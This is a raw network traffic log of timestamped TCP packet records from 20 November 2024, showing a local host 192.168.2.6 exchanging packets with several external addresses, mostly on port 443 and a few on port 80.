                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.761832952 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.883865118 CET4434992513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.902070999 CET49925443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.902102947 CET4434992513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.902667046 CET49925443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.902673006 CET4434992513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.934761047 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.935245037 CET49924443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.935266018 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.935877085 CET49924443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.935883999 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.002321005 CET4434992513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.002598047 CET4434992513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.002660036 CET49925443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.034070015 CET49925443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.034086943 CET4434992513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.041373014 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.041763067 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.041835070 CET49924443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.042284012 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.042329073 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.042542934 CET49924443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.042542934 CET49924443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.042557001 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.042567015 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.042573929 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.045242071 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.045264006 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.045408010 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.045701981 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.045717001 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.046046019 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.046057940 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.092084885 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.092184067 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.118591070 CET49934443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.118627071 CET44349934172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.118792057 CET49934443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.118957996 CET49935443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.118971109 CET44349935172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.119040012 CET49935443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.119214058 CET49935443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.119221926 CET44349935172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.119457006 CET49934443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.119472980 CET44349934172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.342842102 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.355067015 CET49930443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.355096102 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.355598927 CET49930443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.355606079 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.358582973 CET4434992913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.371026993 CET49929443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.371038914 CET4434992913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.372189999 CET49929443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.372195959 CET4434992913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.446470022 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.449487925 CET49931443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.449505091 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.450397015 CET49931443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.450402021 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.450598001 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.450710058 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.450766087 CET49930443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.451076031 CET49930443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.451090097 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.460948944 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.460979939 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.461057901 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.462944984 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.462958097 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.470994949 CET4434992913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.471226931 CET4434992913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.471406937 CET49929443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.472613096 CET49929443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.472623110 CET4434992913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.480536938 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.480556011 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.480791092 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.480963945 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.480973005 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.553051949 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.553250074 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.553313017 CET49931443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.566273928 CET49931443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.566288948 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.578108072 CET49896443192.168.2.618.245.60.107
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.579709053 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.579749107 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.579889059 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.579940081 CET44349935172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.580851078 CET49935443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.580866098 CET44349935172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.581135988 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.581151009 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.581252098 CET44349935172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.581696033 CET49935443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.581773043 CET44349935172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.600122929 CET44349934172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.600694895 CET49934443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.600713968 CET44349934172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.601089001 CET44349934172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.601527929 CET49934443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.601598024 CET44349934172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.619371891 CET4434989618.245.60.107192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.622189999 CET49941443192.168.2.620.189.173.9
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.622226954 CET4434994120.189.173.9192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.622317076 CET49941443192.168.2.620.189.173.9
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.622585058 CET49941443192.168.2.620.189.173.9
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.622597933 CET4434994120.189.173.9192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.685345888 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.692372084 CET49935443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.692720890 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.692754984 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.693424940 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.693429947 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.697288990 CET49942443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.697319031 CET4434994220.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.697549105 CET49942443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.697565079 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.698252916 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.698266983 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.699043989 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.699048042 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.699408054 CET49942443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.699417114 CET4434994220.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.768101931 CET4434989618.245.60.107192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.768860102 CET4434989618.245.60.107192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.769015074 CET49896443192.168.2.618.245.60.107
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.770514011 CET49896443192.168.2.618.245.60.107
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.770536900 CET4434989618.245.60.107192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.788542986 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.788831949 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.788883924 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.788932085 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.789134979 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.789153099 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.789166927 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.789172888 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.792390108 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.792423964 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.792588949 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.792968035 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.792984009 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.800147057 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.800487041 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.800708055 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.801301003 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.801318884 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.801331043 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.801336050 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.811338902 CET44349934172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.811578989 CET49934443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.895853996 CET49944443192.168.2.618.238.49.52
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.895880938 CET4434994418.238.49.52192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.895966053 CET49944443192.168.2.618.238.49.52
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.900182009 CET49944443192.168.2.618.238.49.52
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.900194883 CET4434994418.238.49.52192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.095863104 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.124228954 CET49945443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.124269009 CET4434994520.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.124349117 CET49945443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.126300097 CET49945443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.126327991 CET4434994520.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.134870052 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.134891033 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.135624886 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.135629892 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.148787975 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.150958061 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.150991917 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.151582956 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.151603937 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.151622057 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.152403116 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.152409077 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.162377119 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.162400961 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.217524052 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.224430084 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.224457026 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.225147963 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.225152969 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.234575033 CET49947443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.234610081 CET4434994723.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.234661102 CET49947443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.235025883 CET49948443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.235054970 CET4434994823.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.235115051 CET49948443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.235304117 CET49949443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.235349894 CET4434994923.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.235450029 CET49950443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.235459089 CET4434995023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.235476971 CET49949443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.235557079 CET49950443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.235816956 CET49951443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.235830069 CET4434995123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.236057997 CET49951443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.236709118 CET49947443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.236723900 CET4434994723.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.237539053 CET49951443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.237551928 CET4434995123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.237718105 CET49950443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.237731934 CET4434995023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.237833977 CET49949443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.237848997 CET4434994923.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.237988949 CET49948443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.237998009 CET4434994823.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.241003990 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.241069078 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.241127968 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.241697073 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.241705894 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.246033907 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.247174025 CET49952443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.247199059 CET4434995213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.247255087 CET49952443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.248020887 CET49952443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.248032093 CET4434995213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.253283978 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.262854099 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.263087034 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.263150930 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.263232946 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.263240099 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.263251066 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.263257027 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.267046928 CET49953443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.267067909 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.267164946 CET49953443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.267337084 CET49953443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.267349005 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.296477079 CET4434994220.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.297194004 CET49942443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.297202110 CET4434994220.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.298249960 CET4434994220.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.298305035 CET49942443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.308927059 CET49942443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.309010029 CET4434994220.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.309195995 CET49942443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.309209108 CET4434994220.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.321774006 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.321791887 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.321862936 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.321873903 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.321966887 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.322036028 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.326395035 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.326411963 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.326423883 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.326428890 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.362572908 CET49954443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.362612963 CET4434995413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.362737894 CET49954443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.363179922 CET49954443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.363194942 CET4434995413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.365698099 CET49955443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.365716934 CET4434995513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.365855932 CET49955443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.399235964 CET49942443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.401695013 CET49955443192.168.2.613.107.246.45
